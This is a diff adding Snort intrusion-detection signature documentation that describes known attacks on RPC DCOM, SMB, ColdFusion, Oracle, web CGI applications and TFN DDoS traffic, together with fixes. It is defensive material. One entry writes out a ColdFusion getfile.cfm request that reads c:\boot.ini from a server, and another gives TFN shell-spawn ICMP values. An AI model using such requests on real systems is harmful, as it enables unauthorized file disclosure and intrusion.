+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1344.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted cc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The cc
+command is theGNU project's C and C++ compiler used to compile C and
+C++ sourcefiles into executable binary files. The attacker could
+possibly compilea program needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'cc'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+Web sites using spaces in filenames that also contain the characters
+"cc" may cause this rule to generate an event. For example, the URI
+http://www.foo.com/bar/filecc here.htm will cause an event to be
+generated.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested ona command line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/3389.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3389
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/906.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+906
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. 
+
+--
+Impact:
+Serious. The vulnerability is not limited to files in the webspace, so
+system files or additional unexecuted code files could be retrieved and
+examined for vulnerabilities.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several
+default Example applications installed that have vulnerabilities.  The
+email application can be exploited to allow remote viewing of arbitrary
+files.
+
+
+--
+Affected Systems:
+	ColdFusion versions 2.x, 3.x, 4.x for Windows
+	ColdFusion versions 4.x for Solaris, HP-UX
+	ColdFusion versions 4.5.x for Linux
+
+--
+Attack Scenarios:
+The example application file cfdocs/exampleapp/email/getfile.cfm can 
+accept URL-mangled requests like:
+
+http://www.server.com/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+
+This allows trivial remote retrieval of any file on the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant
+vulnerabilities that are exploitable if the example code is left on a
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+CAN-2001-0535
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0535
+
+Macromedia Security Bulletin (MPSB01-08)
+http://www.macromedia.com/devnet/security/security_zone/mpsb01-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/555.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+555
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2256.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2256
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access.  This attack may permit execution of arbitrary commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite 
+applications to perform remote distributed system administration tasks 
+such as adding new users.  
+
+This event indicates that an RPC query for the sadmind service has been
+made with the credentials of the root user supplied.
+
+This may permit execution of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+All systems using sadmind
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root access to the remote host.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/807.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+Sid:
+807
+
+--
+
+Summary:
+This event is generated when an attempt is made to download the wwwboard password file
+
+--
+Impact:
+Information disclosure.
+An attacker could crack the encrypted password and gain access to the wwwboard
+administrator account
+
+--
+Detailed Information:
+Releases of WWWBoard (Matt Wright's CGI webboard application) before
+version 2.0 Alpha 2.1 place the encrypted password for the web 
+application's administrator in a file called "passwd.txt" accessible
+from the web root.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Attacker downloads the passwd.txt file and then launches a password
+cracker to brute force the password (the password is encypted via
+crypt(3), and password crackers for this format are ubiquitous).  If
+the password is successfully cracked (due to weak passwords or
+significant cracking resources), the attacker will have administrative
+access to the wwwboard web application.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Inspect packet to insure that it was an attempt to download the
+password file and not just a webpage discussing WWWBoard.
+Insure that local installations of WWWBoard are current and properly
+configured to not save the password file into a publically-accessible
+area.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+CVE:  CVE-1999-0953
+Bugtraq:  BID 649
+Arachnids:  463
+
+--
--- /dev/null
+++ b/doc/signatures/1766.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1766
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2970.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2970
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3141.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3141
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/877.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+877
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/933.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+933
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2137.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2137
+
+--
+Summary:
+This event is generated when an attempt is made to access the administration page for the Philboard ASP application. 
+
+--
+Impact:
+Possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the administration page for the Philboard Active Server Page (ASP) application.
+
+This rule generates an event if the attacker makes a request for the administration page from a source external to the protected network.
+
+
+--
+Affected Systems:
+Any host using Philboard.
+
+--
+Attack Scenarios:
+An attacker can gain administrator access to the application by making a simple web request if a specific cookie value is set to "True".
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+This event may be generated by an administrator accessing the administration page from an external source.
+
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Deny access to this page from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2762.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2762
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2249.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2249
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the ASP application ProductCart.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+It is possible to inject SQL commands into the ASP application 
+ProductCart which could lead to the disclosure of information relating 
+to the underlying database and records contained in that database.
+
+--
+Affected Systems:
+	EarlyImpact ProductCart 2br000, 2, 1.6br003, 1.6br001, 1.6br, 1.6b003, 1.6b002, 1.6b001, 1.6b, 1.6003, 1.6002, 1.5004, 1.5003r, 1.5, 1.5002, 1.5003
+
+--
+Attack Scenarios:
+The attacker can supply SQL commands via a URI to access sensitive information.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Harded the system in the manner recommended by the vendor.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Vendor information:
+http://www.earlyimpact.com/productcart/support/security-alert-070603.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3289.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3289
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3044.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3044
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/513.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+513
+
+--
+Summary:
+This event is generated when a Cisco Catalyst switch responds to an external connection that it is listening on the remote management port. 
+
+--
+Impact:
+Denial of service.  A successful connection to the remote management port may allow an attacker access to the switch.
+
+--
+Detailed Information:
+TCP port 7161 is the remote management port for Cisco Catalyst switches.  A vulnerability exists that may allow a user to connect to this port on an affected switch and cause the supervisor module to reload, disabling service while in progress. 
+
+
+--
+Affected Systems:
+Cisco switches:
+
+      The Catalyst 12xx family, running supervisor software versions up to and including 4.29.
+
+      The Catalyst 29xx family (but not the Catalyst 2900XL), running supervisor software versions up to and including 2.1(5), 2.1(501), and 2.1(502). 
+
+      The Catalyst 5xxx series (including the Catalyst 55xx family), running supervisor software versions up to and including 2.1(5), 2.1(501), and 2.1(502).
+
+--
+Attack Scenarios:
+An attacker can exploit a vulnerability associated with the remote management port of Cisco switches, causing a denial of service.
+
+--
+Ease of Attack:
+Unknown.
+
+--
+False Positives:
+This event is generated if any host on the internal network is listening on TCP port 7161 and responds to an external connection request.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable external access to the Cisco switch remote management port.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats
+www.whitehats.com/info/IDS129
+
+CVE 
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0430
+
+--
--- /dev/null
+++ b/doc/signatures/3400.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3400
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3206.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3206
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2360.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2360
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application MyphpPagetool.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+MyphpPagetool contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable ptinclude when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file pt_config.inc.
+
+--
+Affected Systems:
+	myphpPagetool 0.4.3 -1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the ptinclude variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1518.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1518
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+nstelemetry.adp on a web server.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Access to nstelemetry.adp may indicate that a malicious user is trying to
+exploit a well known vulnerability in AOLserver that allows the attacker to read
+password protected files.
+
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	AOLServer.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/228.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+228
+
+--
+Summary:
+This event is generated when a Tribe Flood Network (TFN) Distributed Denial of Service (DDoS) client communicates with the TFN handler daemon to spawn a shell.
+
+--
+Impact:
+Attempted DDoS.  If the listed source IP is in your network, it may be a TFN client.  If the listed destination IP is in your network, it may be a TFN handler daemon.
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Clients communicate with daemons to direct them to launch attacks. A client will communicate with a daemon to spawn a shell via an ICMP echo reply with an ICMP identification number of 456 and an ICMP sequence number of 0.  
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN client, it will attempt to communicate with other TFN handler daemons.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+It is possible that this is a legitimate echo reply to a previous echo request that had an ICMP identification value of 456 and an ICMP sequence number of 0.  
+
+--
+False Negatives:
+None Known.
+
+--
